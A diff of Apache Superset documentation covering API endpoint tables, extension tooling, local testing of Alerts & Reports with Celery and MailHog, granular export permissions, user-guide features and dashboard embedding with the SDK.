| `GET` | [Get security permissions resources by pk](/developer-docs/api/get-security-permissions-resources-by-pk) | `/api/v1/security/permissions-resources/{pk}` |
|
||||
| `PUT` | [Update security permissions resources by pk](/developer-docs/api/update-security-permissions-resources-by-pk) | `/api/v1/security/permissions-resources/{pk}` |
|
||||
|
||||
</details>
|
||||
|
||||
@@ -481,14 +481,14 @@ curl -H "Authorization: Bearer YOUR_ACCESS_TOKEN" \
|
||||
|
||||
| Method | Endpoint | Description |
|
||||
|--------|----------|-------------|
|
||||
| `DELETE` | [Bulk delete RLS rules](./api/bulk-delete-rls-rules) | `/api/v1/rowlevelsecurity/` |
|
||||
| `GET` | [Get a list of RLS](./api/get-a-list-of-rls) | `/api/v1/rowlevelsecurity/` |
|
||||
| `POST` | [Create a new RLS rule](./api/create-a-new-rls-rule) | `/api/v1/rowlevelsecurity/` |
|
||||
| `GET` | [Get metadata information about this API resource (rowlevelsecurity--info)](./api/get-metadata-information-about-this-api-resource-rowlevelsecurity-info) | `/api/v1/rowlevelsecurity/_info` |
|
||||
| `DELETE` | [Delete an RLS](./api/delete-an-rls) | `/api/v1/rowlevelsecurity/{pk}` |
|
||||
| `GET` | [Get an RLS](./api/get-an-rls) | `/api/v1/rowlevelsecurity/{pk}` |
|
||||
| `PUT` | [Update an RLS rule](./api/update-an-rls-rule) | `/api/v1/rowlevelsecurity/{pk}` |
|
||||
| `GET` | [Get related fields data (rowlevelsecurity-related-column-name)](./api/get-related-fields-data-rowlevelsecurity-related-column-name) | `/api/v1/rowlevelsecurity/related/{column_name}` |
|
||||
| `DELETE` | [Bulk delete RLS rules](/developer-docs/api/bulk-delete-rls-rules) | `/api/v1/rowlevelsecurity/` |
|
||||
| `GET` | [Get a list of RLS](/developer-docs/api/get-a-list-of-rls) | `/api/v1/rowlevelsecurity/` |
|
||||
| `POST` | [Create a new RLS rule](/developer-docs/api/create-a-new-rls-rule) | `/api/v1/rowlevelsecurity/` |
|
||||
| `GET` | [Get metadata information about this API resource (rowlevelsecurity--info)](/developer-docs/api/get-metadata-information-about-this-api-resource-rowlevelsecurity-info) | `/api/v1/rowlevelsecurity/_info` |
|
||||
| `DELETE` | [Delete an RLS](/developer-docs/api/delete-an-rls) | `/api/v1/rowlevelsecurity/{pk}` |
|
||||
| `GET` | [Get an RLS](/developer-docs/api/get-an-rls) | `/api/v1/rowlevelsecurity/{pk}` |
|
||||
| `PUT` | [Update an RLS rule](/developer-docs/api/update-an-rls-rule) | `/api/v1/rowlevelsecurity/{pk}` |
|
||||
| `GET` | [Get related fields data (rowlevelsecurity-related-column-name)](/developer-docs/api/get-related-fields-data-rowlevelsecurity-related-column-name) | `/api/v1/rowlevelsecurity/related/{column_name}` |
|
||||
|
||||
</details>
|
||||
|
||||
@@ -499,8 +499,8 @@ curl -H "Authorization: Bearer YOUR_ACCESS_TOKEN" \
|
||||
|
||||
| Method | Endpoint | Description |
|
||||
|--------|----------|-------------|
|
||||
| `GET` | [Export all assets](./api/export-all-assets) | `/api/v1/assets/export/` |
|
||||
| `POST` | [Import multiple assets](./api/import-multiple-assets) | `/api/v1/assets/import/` |
|
||||
| `GET` | [Export all assets](/developer-docs/api/export-all-assets) | `/api/v1/assets/export/` |
|
||||
| `POST` | [Import multiple assets](/developer-docs/api/import-multiple-assets) | `/api/v1/assets/import/` |
|
||||
|
||||
</details>
|
||||
|
||||
@@ -509,7 +509,7 @@ curl -H "Authorization: Bearer YOUR_ACCESS_TOKEN" \
|
||||
|
||||
| Method | Endpoint | Description |
|
||||
|--------|----------|-------------|
|
||||
| `POST` | [Invalidate cache records and remove the database records](./api/invalidate-cache-records-and-remove-the-database-records) | `/api/v1/cachekey/invalidate` |
|
||||
| `POST` | [Invalidate cache records and remove the database records](/developer-docs/api/invalidate-cache-records-and-remove-the-database-records) | `/api/v1/cachekey/invalidate` |
|
||||
|
||||
</details>
|
||||
|
||||
@@ -518,10 +518,10 @@ curl -H "Authorization: Bearer YOUR_ACCESS_TOKEN" \
|
||||
|
||||
| Method | Endpoint | Description |
|
||||
|--------|----------|-------------|
|
||||
| `GET` | [Get a list of logs](./api/get-a-list-of-logs) | `/api/v1/log/` |
|
||||
| `POST` | [Create log](./api/create-log) | `/api/v1/log/` |
|
||||
| `GET` | [Get a log detail information](./api/get-a-log-detail-information) | `/api/v1/log/{pk}` |
|
||||
| `GET` | [Get recent activity data for a user](./api/get-recent-activity-data-for-a-user) | `/api/v1/log/recent_activity/` |
|
||||
| `GET` | [Get a list of logs](/developer-docs/api/get-a-list-of-logs) | `/api/v1/log/` |
|
||||
| `POST` | [Create log](/developer-docs/api/create-log) | `/api/v1/log/` |
|
||||
| `GET` | [Get a log detail information](/developer-docs/api/get-a-log-detail-information) | `/api/v1/log/{pk}` |
|
||||
| `GET` | [Get recent activity data for a user](/developer-docs/api/get-recent-activity-data-for-a-user) | `/api/v1/log/recent_activity/` |
|
||||
|
||||
</details>
|
||||
|
||||
@@ -532,8 +532,8 @@ curl -H "Authorization: Bearer YOUR_ACCESS_TOKEN" \
|
||||
|
||||
| Method | Endpoint | Description |
|
||||
|--------|----------|-------------|
|
||||
| `GET` | [Get the user object](./api/get-the-user-object) | `/api/v1/me/` |
|
||||
| `GET` | [Get the user roles](./api/get-the-user-roles) | `/api/v1/me/roles/` |
|
||||
| `GET` | [Get the user object](/developer-docs/api/get-the-user-object) | `/api/v1/me/` |
|
||||
| `GET` | [Get the user roles](/developer-docs/api/get-the-user-roles) | `/api/v1/me/roles/` |
|
||||
|
||||
</details>
|
||||
|
||||
@@ -542,7 +542,7 @@ curl -H "Authorization: Bearer YOUR_ACCESS_TOKEN" \
|
||||
|
||||
| Method | Endpoint | Description |
|
||||
|--------|----------|-------------|
|
||||
| `GET` | [Get the user avatar](./api/get-the-user-avatar) | `/api/v1/user/{user_id}/avatar.png` |
|
||||
| `GET` | [Get the user avatar](/developer-docs/api/get-the-user-avatar) | `/api/v1/user/{user_id}/avatar.png` |
|
||||
|
||||
</details>
|
||||
|
||||
@@ -551,7 +551,7 @@ curl -H "Authorization: Bearer YOUR_ACCESS_TOKEN" \
|
||||
|
||||
| Method | Endpoint | Description |
|
||||
|--------|----------|-------------|
|
||||
| `GET` | [Get menu](./api/get-menu) | `/api/v1/menu/` |
|
||||
| `GET` | [Get menu](/developer-docs/api/get-menu) | `/api/v1/menu/` |
|
||||
|
||||
</details>
|
||||
|
||||
@@ -560,7 +560,7 @@ curl -H "Authorization: Bearer YOUR_ACCESS_TOKEN" \
|
||||
|
||||
| Method | Endpoint | Description |
|
||||
|--------|----------|-------------|
|
||||
| `GET` | [Get all available domains](./api/get-all-available-domains) | `/api/v1/available_domains/` |
|
||||
| `GET` | [Get all available domains](/developer-docs/api/get-all-available-domains) | `/api/v1/available_domains/` |
|
||||
|
||||
</details>
|
||||
|
||||
@@ -569,7 +569,7 @@ curl -H "Authorization: Bearer YOUR_ACCESS_TOKEN" \
|
||||
|
||||
| Method | Endpoint | Description |
|
||||
|--------|----------|-------------|
|
||||
| `GET` | [Read off of the Redis events stream](./api/read-off-of-the-redis-events-stream) | `/api/v1/async_event/` |
|
||||
| `GET` | [Read off of the Redis events stream](/developer-docs/api/read-off-of-the-redis-events-stream) | `/api/v1/async_event/` |
|
||||
|
||||
</details>
|
||||
|
||||
@@ -578,7 +578,29 @@ curl -H "Authorization: Bearer YOUR_ACCESS_TOKEN" \
|
||||
|
||||
| Method | Endpoint | Description |
|
||||
|--------|----------|-------------|
|
||||
| `GET` | [Get api by version openapi](./api/get-api-by-version-openapi) | `/api/{version}/_openapi` |
|
||||
| `GET` | [Get api by version openapi](/developer-docs/api/get-api-by-version-openapi) | `/api/{version}/_openapi` |
|
||||
|
||||
</details>
|
||||
|
||||
<details>
|
||||
<summary><strong>Themes</strong> (14 endpoints) — Manage UI themes for customizing Superset's appearance.</summary>
|
||||
|
||||
| Method | Endpoint | Description |
|
||||
|--------|----------|-------------|
|
||||
| `DELETE` | [Bulk delete themes](/developer-docs/api/bulk-delete-themes) | `/api/v1/theme/` |
|
||||
| `GET` | [Get a list of themes](/developer-docs/api/get-a-list-of-themes) | `/api/v1/theme/` |
|
||||
| `POST` | [Create a theme](/developer-docs/api/create-a-theme) | `/api/v1/theme/` |
|
||||
| `GET` | [Get metadata information about this API resource (theme-info)](/developer-docs/api/get-metadata-information-about-this-api-resource-theme-info) | `/api/v1/theme/_info` |
|
||||
| `DELETE` | [Delete a theme](/developer-docs/api/delete-a-theme) | `/api/v1/theme/{pk}` |
|
||||
| `GET` | [Get a theme](/developer-docs/api/get-a-theme) | `/api/v1/theme/{pk}` |
|
||||
| `PUT` | [Update a theme](/developer-docs/api/update-a-theme) | `/api/v1/theme/{pk}` |
|
||||
| `PUT` | [Set a theme as the system dark theme](/developer-docs/api/set-a-theme-as-the-system-dark-theme) | `/api/v1/theme/{pk}/set_system_dark` |
|
||||
| `PUT` | [Set a theme as the system default theme](/developer-docs/api/set-a-theme-as-the-system-default-theme) | `/api/v1/theme/{pk}/set_system_default` |
|
||||
| `GET` | [Download multiple themes as YAML files](/developer-docs/api/download-multiple-themes-as-yaml-files) | `/api/v1/theme/export/` |
|
||||
| `POST` | [Import themes from a ZIP file](/developer-docs/api/import-themes-from-a-zip-file) | `/api/v1/theme/import/` |
|
||||
| `GET` | [Get related fields data (theme-related-column-name)](/developer-docs/api/get-related-fields-data-theme-related-column-name) | `/api/v1/theme/related/{column_name}` |
|
||||
| `DELETE` | [Clear the system dark theme](/developer-docs/api/clear-the-system-dark-theme) | `/api/v1/theme/unset_system_dark` |
|
||||
| `DELETE` | [Clear the system default theme](/developer-docs/api/clear-the-system-default-theme) | `/api/v1/theme/unset_system_default` |
|
||||
|
||||
</details>
|
||||
|
||||
|
||||
@@ -39,13 +39,17 @@ superset-extensions bundle: Packages the extension into a .supx file.
|
||||
|
||||
superset-extensions dev: Automatically rebuilds the extension as files change.
|
||||
|
||||
superset-extensions validate: Validates the extension structure and metadata.
|
||||
superset-extensions validate: Validates the extension structure and metadata consistency.
|
||||
|
||||
superset-extensions update: Updates derived and generated files in the extension project.
|
||||
Use --version [<version>] to update the version (prompts if no value given).
|
||||
Use --license [<license>] to update the license (prompts if no value given).
|
||||
```
|
||||
|
||||
When creating a new extension with `superset-extensions init`, the CLI generates a standardized folder structure:
|
||||
|
||||
```
|
||||
my-org.dataset-references/
|
||||
dataset-references/
|
||||
├── extension.json
|
||||
├── frontend/
|
||||
│ ├── src/
|
||||
@@ -76,7 +80,7 @@ my-org.dataset-references/
|
||||
```
|
||||
|
||||
**Note**: With publisher `my-org` and name `dataset-references`, the technical names are:
|
||||
- Directory name: `my-org.dataset-references` (kebab-case)
|
||||
- Directory name: `dataset-references` (kebab-case)
|
||||
- Backend Python namespace: `my_org.dataset_references`
|
||||
- Backend distribution package: `my_org-dataset_references`
|
||||
- Frontend package name: `@my-org/dataset-references` (scoped)
|
||||
|
||||
@@ -75,7 +75,7 @@ This approach ensures that extensions from different organizations cannot confli
|
||||
This creates a complete project structure:
|
||||
|
||||
```
|
||||
my-org.hello-world/
|
||||
hello-world/
|
||||
├── extension.json # Extension metadata and configuration
|
||||
├── backend/ # Backend Python code
|
||||
│ ├── src/
|
||||
|
||||
@@ -52,7 +52,6 @@ module.exports = {
|
||||
'extensions/development',
|
||||
'extensions/deployment',
|
||||
'extensions/mcp',
|
||||
'extensions/mcp-server',
|
||||
'extensions/security',
|
||||
'extensions/tasks',
|
||||
'extensions/registry',
|
||||
|
||||
@@ -63,6 +63,109 @@ pytest tests/unit_tests/
|
||||
pytest tests/integration_tests/
|
||||
```
|
||||
|
||||
## Testing Alerts & Reports with Celery and MailHog
|
||||
|
||||
The Alerts & Reports feature relies on Celery for task scheduling and execution. To test it locally, you need Redis (message broker), Celery Beat (scheduler), a Celery Worker (executor), and an SMTP server to receive email notifications.
|
||||
|
||||
### Prerequisites
|
||||
|
||||
- Redis running on `localhost:6379`
|
||||
- [MailHog](https://github.com/mailhog/MailHog) installed (a local SMTP server with a web UI for viewing caught emails)
|
||||
|
||||
### superset_config.py
|
||||
|
||||
Your `CeleryConfig` **must** include `beat_schedule`. When you define a custom `CeleryConfig` class in `superset_config.py`, it replaces the default entirely. If you omit `beat_schedule`, Celery Beat will start but never schedule any report tasks.
|
||||
|
||||
```python
|
||||
from celery.schedules import crontab
|
||||
from superset.tasks.types import ExecutorType
|
||||
|
||||
REDIS_HOST = "localhost"
|
||||
REDIS_PORT = "6379"
|
||||
|
||||
class CeleryConfig:
|
||||
broker_url = f"redis://{REDIS_HOST}:{REDIS_PORT}/0"
|
||||
result_backend = f"redis://{REDIS_HOST}:{REDIS_PORT}/0"
|
||||
broker_connection_retry_on_startup = True
|
||||
imports = (
|
||||
"superset.sql_lab",
|
||||
"superset.tasks.scheduler",
|
||||
"superset.tasks.thumbnails",
|
||||
"superset.tasks.cache",
|
||||
)
|
||||
worker_prefetch_multiplier = 10
|
||||
task_acks_late = True
|
||||
beat_schedule = {
|
||||
"reports.scheduler": {
|
||||
"task": "reports.scheduler",
|
||||
"schedule": crontab(minute="*", hour="*"),
|
||||
},
|
||||
"reports.prune_log": {
|
||||
"task": "reports.prune_log",
|
||||
"schedule": crontab(minute=0, hour=0),
|
||||
},
|
||||
}
|
||||
|
||||
CELERY_CONFIG = CeleryConfig
|
||||
|
||||
# SMTP settings pointing to MailHog
|
||||
SMTP_HOST = "localhost"
|
||||
SMTP_PORT = 1025
|
||||
SMTP_STARTTLS = False
|
||||
SMTP_SSL = False
|
||||
SMTP_USER = ""
|
||||
SMTP_PASSWORD = ""
|
||||
SMTP_MAIL_FROM = "superset@localhost"
|
||||
|
||||
# Must match where your frontend is running
|
||||
WEBDRIVER_BASEURL = "http://localhost:9000/"
|
||||
|
||||
ALERT_REPORTS_EXECUTE_AS = [ExecutorType.OWNER]
|
||||
|
||||
FEATURE_FLAGS = {
|
||||
"ALERT_REPORTS": True,
|
||||
# Recommended for better screenshot support (WebGL/DeckGL charts)
|
||||
"PLAYWRIGHT_REPORTS_AND_THUMBNAILS": True,
|
||||
}
|
||||
```
|
||||
|
||||
:::note
|
||||
Do not include `"superset.tasks.async_queries"` in `CeleryConfig.imports` unless you need Global Async Queries. That module accesses `current_app.config` at import time and will crash the worker with a "Working outside of application context" error.
|
||||
:::
|
||||
|
||||
### Starting the Services
|
||||
|
||||
Start MailHog, then Celery Beat and Worker in separate terminals:
|
||||
|
||||
```bash
|
||||
# Terminal 1 - MailHog (SMTP on :1025, Web UI on :8025)
|
||||
MailHog
|
||||
|
||||
# Terminal 2 - Celery Beat (scheduler)
|
||||
celery --app=superset.tasks.celery_app:app beat --loglevel=info
|
||||
|
||||
# Terminal 3 - Celery Worker (executor)
|
||||
celery --app=superset.tasks.celery_app:app worker --concurrency=1 --loglevel=info
|
||||
```
|
||||
|
||||
Use `--concurrency=1` to limit resource usage on your dev machine.
|
||||
|
||||
### Verifying the Setup
|
||||
|
||||
1. **Beat** should log `Scheduler: Sending due task reports.scheduler (reports.scheduler)` once per minute
|
||||
2. **Worker** should log `Scheduling alert <name> eta: <timestamp>` for each active report
|
||||
3. Create a test report in **Settings > Alerts & Reports** with a `* * * * *` cron schedule
|
||||
4. Check **http://localhost:8025** (MailHog web UI) for the email within 1-2 minutes
|
||||
|
||||
### Troubleshooting
|
||||
|
||||
| Problem | Solution |
|
||||
|---|---|
|
||||
| Beat shows no output | Ensure `beat_schedule` is defined in your `CeleryConfig` and `--loglevel=info` is set |
|
||||
| "Report Schedule is still working, refusing to re-compute" | Previous executions are stuck. Reset with: `UPDATE report_schedule SET last_state = 'Not triggered' WHERE id = <id>;` |
|
||||
| Task backlog overwhelming the worker | Flush Redis: `redis-cli FLUSHDB`, then restart Beat and Worker |
|
||||
| Screenshot timeout | Ensure your frontend dev server is running and `WEBDRIVER_BASEURL` matches its URL |
|
||||
|
||||
---
|
||||
|
||||
*This documentation is under active development. Check back soon for updates!*
|
||||
|
||||
@@ -91,7 +91,7 @@ or a view.
|
||||
When working with tables, the solution would be to create a table that contains all the fields
|
||||
needed for your analysis, most likely through some scheduled batch process.
|
||||
|
||||
A view is a simple logical layer that abstracts an arbitrary SQL queries as a virtual table. This can
|
||||
A view is a simple logical layer that abstracts an arbitrary SQL query as a virtual table. This can
|
||||
allow you to join and union multiple tables and to apply some transformation using arbitrary SQL
|
||||
expressions. The limitation there is your database performance, as Superset effectively will run a
|
||||
query on top of your query (view). A good practice may be to limit yourself to joining your main
|
||||
|
||||
78
docs/docs/security/granular-export-controls.mdx
Normal file
78
docs/docs/security/granular-export-controls.mdx
Normal file
@@ -0,0 +1,78 @@
|
||||
---
|
||||
title: Granular Export Controls
|
||||
sidebar_position: 4
|
||||
---
|
||||
|
||||
# Granular Export Controls
|
||||
|
||||
Superset provides granular, permission-based controls for data export, image export, and clipboard operations. These replace the legacy `can_csv` permission with three fine-grained permissions that can be assigned independently to roles.
|
||||
|
||||
## Feature Flag
|
||||
|
||||
Granular export controls are gated behind the `GRANULAR_EXPORT_CONTROLS` feature flag. When the flag is disabled, the legacy `can_csv` permission behavior is preserved.
|
||||
|
||||
```python
|
||||
FEATURE_FLAGS = {
|
||||
"GRANULAR_EXPORT_CONTROLS": True,
|
||||
}
|
||||
```
|
||||
|
||||
## Permissions
|
||||
|
||||
| Permission | Resource | Controls |
|
||||
| -------------------- | ---------- | ---------------------------------------------------------------------- |
|
||||
| `can_export_data` | `Superset` | CSV, Excel, and JSON data exports from charts, dashboards, and SQL Lab |
|
||||
| `can_export_image` | `Superset` | Screenshot (JPEG/PNG) and PDF exports from charts and dashboards |
|
||||
| `can_copy_clipboard` | `Superset` | Copy-to-clipboard operations in SQL Lab and the Explore data pane |
|
||||
|
||||
## Default Role Assignments
|
||||
|
||||
The migration grants all three new permissions (`can_export_data`, `can_export_image`, `can_copy_clipboard`) to every role that currently has `can_csv`. This preserves existing behavior — no role loses access during the upgrade.
|
||||
|
||||
After the migration, admins can selectively revoke individual export permissions from any role to restrict access. For example, to prevent Gamma users from exporting data or images while still allowing clipboard operations, revoke `can_export_data` and `can_export_image` from the Gamma role.
|
||||
|
||||
## Configuration Steps
|
||||
|
||||
1. **Enable the feature flag** in `superset_config.py`:
|
||||
|
||||
```python
|
||||
FEATURE_FLAGS = {
|
||||
"GRANULAR_EXPORT_CONTROLS": True,
|
||||
}
|
||||
```
|
||||
|
||||
2. **Run the database migration** to register the new permissions:
|
||||
|
||||
```bash
|
||||
superset db upgrade
|
||||
```
|
||||
|
||||
3. **Initialize permissions** so roles are populated:
|
||||
|
||||
```bash
|
||||
superset init
|
||||
```
|
||||
|
||||
4. **Verify role assignments** in **Settings > List Roles**. Confirm that each role has the expected permissions from the table above.
|
||||
|
||||
5. **Customize as needed**: Grant or revoke individual export permissions on any role through the role editor.
|
||||
|
||||
## User Experience
|
||||
|
||||
When a user lacks a required export permission:
|
||||
|
||||
- **Menu items** (CSV, Excel, JSON, screenshot) appear **disabled** with an info tooltip icon explaining the restriction
|
||||
- **Buttons** (SQL Lab download, clipboard copy) appear **disabled** with a tooltip on hover
|
||||
- **API endpoints** return **403 Forbidden** when the corresponding permission is missing
|
||||
|
||||
## API Enforcement
|
||||
|
||||
The following API endpoints enforce granular export permissions when the feature flag is enabled:
|
||||
|
||||
| Endpoint | Required Permission |
|
||||
| --------------------------------------------------------- | ------------------- |
|
||||
| `GET /api/v1/chart/{id}/data/` (CSV/Excel format) | `can_export_data` |
|
||||
| `GET /api/v1/chart/{id}/cache_screenshot/` | `can_export_image` |
|
||||
| `POST /api/v1/dashboard/{id}/cache_dashboard_screenshot/` | `can_export_image` |
|
||||
| `GET /api/v1/sqllab/export/{client_id}/` | `can_export_data` |
|
||||
| `POST /api/v1/sqllab/export_streaming/` | `can_export_data` |
|
||||
@@ -63,6 +63,12 @@ by clicking the **Connect** button in the bottom right corner of the modal windo
|
||||
|
||||
Congratulations, you've just added a new data source in Superset!
|
||||
|
||||
### Sharing a Database Connection
|
||||
|
||||
When adding a new database, you can share the connection with other Superset users. Shared connections appear in other users' database lists, making it easier to collaborate on the same data without requiring each user to configure the same connection separately.
|
||||
|
||||
To share a connection, enable the **Share connection with other users** option in the **Advanced** tab of the database connection modal before saving. You can change sharing settings later by editing the database connection.
|
||||
|
||||
### Registering a new table
|
||||
|
||||
Now that you’ve configured a data source, you can select specific tables (called **Datasets** in Superset)
|
||||
@@ -80,6 +86,22 @@ we register the **cleaned_sales_data** table from the **examples** database.
|
||||
|
||||
To finish, click the **Add** button in the bottom right corner. You should now see your dataset in the list of datasets.
|
||||
|
||||
### Organizing Datasets into Folders
|
||||
|
||||
The Datasets list view supports **folders** for organizing datasets into groups. To create and manage folders:
|
||||
|
||||
1. In the **Datasets** list, click the **Folders** panel on the left sidebar.
|
||||
2. Click **+ New Folder** to create a top-level folder, or drag an existing folder to nest it.
|
||||
3. Drag dataset rows onto a folder to move them in, or right-click a dataset and select **Move to folder**.
|
||||
|
||||
Folders are per-user organizational aids — they do not affect dataset access permissions or how other users see the datasets.
|
||||
|
||||
### Uploading Files via the OS File Manager (PWA)
|
||||
|
||||
When Superset is installed as a **Progressive Web App (PWA)** from your browser, your operating system will offer Superset as an option when opening CSV, Excel (`.xls`/`.xlsx`), and Parquet files. Double-clicking or right-clicking a supported file and selecting "Open with Superset" navigates directly to the upload workflow for that file.
|
||||
|
||||
To install Superset as a PWA, look for the install icon in your browser's address bar (Chrome, Edge) when visiting your Superset instance over HTTPS. PWA installation requires HTTPS and a valid manifest — your admin needs to confirm the app manifest is served correctly.
|
||||
|
||||
### Customizing column properties
|
||||
|
||||
Now that you've registered your dataset, you can configure column properties
|
||||
@@ -234,6 +256,64 @@ For example, when running the local development build, the following will disabl
|
||||
Top Nav and remove the Filter Bar:
|
||||
`http://localhost:8088/superset/dashboard/my-dashboard/?standalone=1&show_filters=0`
|
||||
|
||||
### AG Grid Interactive Table
|
||||
|
||||
The **AG Grid Interactive Table** chart type is Superset's fully-featured data grid, suitable for large paginated datasets where the standard Table chart is not enough.
|
||||
|
||||
#### Server-Side Column Filters
|
||||
|
||||
AG Grid supports server-side column filters that query the full dataset — not just the loaded page. Filters are applied before data is sent to the browser, so results are correct even across millions of rows.
|
||||
|
||||
**Available filter types:**
|
||||
|
||||
| Column type | Filter options |
|
||||
|---|---|
|
||||
| Text | Contains, equals, starts with, ends with |
|
||||
| Number | Equals, not equal, less than, greater than, between |
|
||||
| Date | Before, after, between, blank |
|
||||
| Set | Select from a list of distinct values |
|
||||
|
||||
**AND / OR logic:** Each column supports combining multiple conditions with AND or OR. Filters from different columns are always combined with AND.
|
||||
|
||||
**Interaction with pagination:** Server-side filters run as WHERE clauses in the underlying SQL query, so pagination always operates over the already-filtered result set.
|
||||
|
||||
#### Time Shift (Time Comparison)
|
||||
|
||||
AG Grid Interactive Table supports **Time Shift** (time comparison), matching the behavior of the standard Table chart. In the **Advanced Analytics** → **Time Comparison** section of the chart configuration, enter a shift expression (e.g., `1 year ago`, `minus 7 days`) to add comparison columns showing values from the offset period. Dashboard-level time range overrides apply to both the base and comparison periods.
|
||||
|
||||
### Dynamic Currency Formatting
|
||||
|
||||
Chart metric values can display currencies dynamically rather than using a fixed currency code. To enable:
|
||||
|
||||
1. Open the dataset editor for your dataset (**Datasets → Edit**).
|
||||
2. In the **Advanced** tab, set **Currency Code Column** to the name of a column in your dataset that contains ISO 4217 currency codes (e.g., `USD`, `EUR`, `GBP`).
|
||||
3. In the Explore chart configuration, open the metric's **Number format** section and select **Auto-detect** for currency.
|
||||
|
||||
When Auto-detect is active, each row uses the currency code from the designated column, so a single chart can display values in multiple currencies — each formatted correctly for its currency.
|
||||
|
||||
### ECharts Option Editor
|
||||
|
||||
For ECharts-based chart types (line, bar, area, scatter, pie, and others), Explore includes an advanced **ECharts Option Editor** that accepts raw JSON overrides for the underlying ECharts configuration.
|
||||
|
||||
Access it via the **Customize** tab → **ECharts Options** section at the bottom of the panel. The JSON you enter is deep-merged on top of Superset's generated ECharts config, so you can override specific options without rewriting the entire config.
|
||||
|
||||
**Example:** override the legend position and add a custom title:
|
||||
|
||||
```json
|
||||
{
|
||||
"legend": { "orient": "vertical", "right": "5%", "top": "middle" },
|
||||
"title": { "text": "My Custom Title", "left": "center" }
|
||||
}
|
||||
```
|
||||
|
||||
:::caution
|
||||
ECharts option overrides bypass Superset's validation layer. Invalid option keys are silently ignored by ECharts. Overrides that conflict with Superset-generated options (e.g., `series`) may produce unexpected results.
|
||||
:::
|
||||
|
||||
### Table Chart: Exporting Filtered Data
|
||||
|
||||
When the **Search Box** is visible in a Table chart, the **Download** action exports only the rows currently visible after the search filter is applied — not the full underlying dataset. This matches the visual output and is intentional. To export the full dataset regardless of search state, use the **Download as CSV** option from the chart's three-dot menu in the dashboard or from the Explore chart toolbar before applying a search filter.
|
||||
|
||||
:::resources
|
||||
- [Dashboard Customization](https://docs.preset.io/docs/dashboard-customization) - Advanced dashboard styling and layout options
|
||||
- [Blog: BI Dashboard Best Practices](https://preset.io/blog/bi-dashboard-best-practices/)
|
||||
|
||||
130
docs/docs/using-superset/embedding.mdx
Normal file
130
docs/docs/using-superset/embedding.mdx
Normal file
@@ -0,0 +1,130 @@
|
||||
{/*
|
||||
Licensed to the Apache Software Foundation (ASF) under one
|
||||
or more contributor license agreements. See the NOTICE file
|
||||
distributed with this work for additional information
|
||||
regarding copyright ownership. The ASF licenses this file
|
||||
to you under the Apache License, Version 2.0 (the
|
||||
"License"); you may not use this file except in compliance
|
||||
with the License. You may obtain a copy of the License at
|
||||
|
||||
http://www.apache.org/licenses/LICENSE-2.0
|
||||
|
||||
Unless required by applicable law or agreed to in writing,
|
||||
software distributed under the License is distributed on an
|
||||
"AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
|
||||
KIND, either express or implied. See the License for the
|
||||
specific language governing permissions and limitations
|
||||
under the License.
|
||||
*/}
|
||||
|
||||
---
|
||||
title: Embedding Superset
|
||||
sidebar_position: 6
|
||||
---
|
||||
|
||||
# Embedding Superset
|
||||
|
||||
Superset dashboards can be embedded directly in host applications using the `@superset-ui/embedded-sdk` package.
|
||||
|
||||
:::info Prerequisites
|
||||
- The `EMBEDDED_SUPERSET` feature flag must be enabled.
|
||||
- The embedding domain and allowed origins must be configured by an admin.
|
||||
:::
|
||||
|
||||
## Quick Start
|
||||
|
||||
Install the SDK:
|
||||
|
||||
```bash
|
||||
npm install @superset-ui/embedded-sdk
|
||||
```
|
||||
|
||||
Embed a dashboard:
|
||||
|
||||
```javascript
|
||||
import { embedDashboard } from '@superset-ui/embedded-sdk';
|
||||
|
||||
embedDashboard({
|
||||
id: 'dashboard-uuid-here', // from Dashboard → Embed
|
||||
supersetDomain: 'https://superset.example.com',
|
||||
mountPoint: document.getElementById('superset-container'),
|
||||
fetchGuestToken: () => fetchTokenFromYourBackend(),
|
||||
dashboardUiConfig: {
|
||||
hideTitle: true,
|
||||
filters: { expanded: false },
|
||||
},
|
||||
});
|
||||
```
|
||||
|
||||
`fetchGuestToken` must return a **guest token** obtained from your server by calling Superset's `/api/v1/security/guest_token/` endpoint with a service account. Do not call this endpoint from client-side code.
|
||||
|
||||
---
|
||||
|
||||
## Callbacks
|
||||
|
||||
### `resolvePermalinkUrl`
|
||||
|
||||
When a user copies a permalink from an embedded dashboard, Superset generates a URL on its own domain. In an embedded context this URL is usually not meaningful to the host application's users — the dashboard is rendered inside the host app, not at the Superset URL.
|
||||
|
||||
The `resolvePermalinkUrl` callback lets the host app intercept permalink generation and return a URL on the host domain instead:
|
||||
|
||||
```javascript
|
||||
embedDashboard({
|
||||
id: 'my-dashboard-uuid',
|
||||
supersetDomain: 'https://superset.example.com',
|
||||
mountPoint: document.getElementById('superset-container'),
|
||||
fetchGuestToken: () => fetchGuestToken(),
|
||||
/**
|
||||
* Called when Superset generates a permalink.
|
||||
* @param {Object} args - { key: string } — the permalink key
|
||||
* @returns {string | null} - your host URL, or null to use Superset's default
|
||||
*/
|
||||
resolvePermalinkUrl: ({ key }) => {
|
||||
return `https://myapp.example.com/dashboard?permalink=${key}`;
|
||||
},
|
||||
});
|
||||
```
|
||||
|
||||
If the callback returns `null` or is not provided, Superset uses its own permalink URL as a fallback.
|
||||
|
||||
---
|
||||
|
||||
## Feature Flags for Embedded Mode
|
||||
|
||||
### `DISABLE_EMBEDDED_SUPERSET_LOGOUT`
|
||||
|
||||
Hides the logout button when Superset is embedded in a host application. This is useful when the host application manages the session lifecycle and you do not want users to accidentally log out of the embedded Superset session:
|
||||
|
||||
```python
|
||||
# superset_config.py
|
||||
FEATURE_FLAGS = {
|
||||
"EMBEDDED_SUPERSET": True,
|
||||
"DISABLE_EMBEDDED_SUPERSET_LOGOUT": True,
|
||||
}
|
||||
```
|
||||
|
||||
When enabled, the **Logout** menu item is removed from the user avatar dropdown in the embedded view. The session can still be invalidated server-side by revoking the guest token.
|
||||
|
||||
### `EMBEDDED_SUPERSET`
|
||||
|
||||
Must be `True` to enable the embedded SDK and the guest token endpoint. Without this flag, `embedDashboard` will fail to load.
|
||||
|
||||
---
|
||||
|
||||
## URL Parameters
|
||||
|
||||
The following URL parameters can be passed through the `urlParams` option in `dashboardUiConfig` or appended to the embedded iframe URL:
|
||||
|
||||
| Parameter | Values | Effect |
|
||||
|-----------|--------|--------|
|
||||
| `standalone` | `0`, `1`, `2`, `3` | `0`: normal; `1`: hide nav; `2`: hide nav + title; `3`: hide nav + title + tabs |
|
||||
| `show_filters` | `0`, `1` | Show or hide the native filter bar |
|
||||
| `expand_filters` | `0`, `1` | Start with filter bar expanded or collapsed |
|
||||
|
||||
---
|
||||
|
||||
## Security Notes
|
||||
|
||||
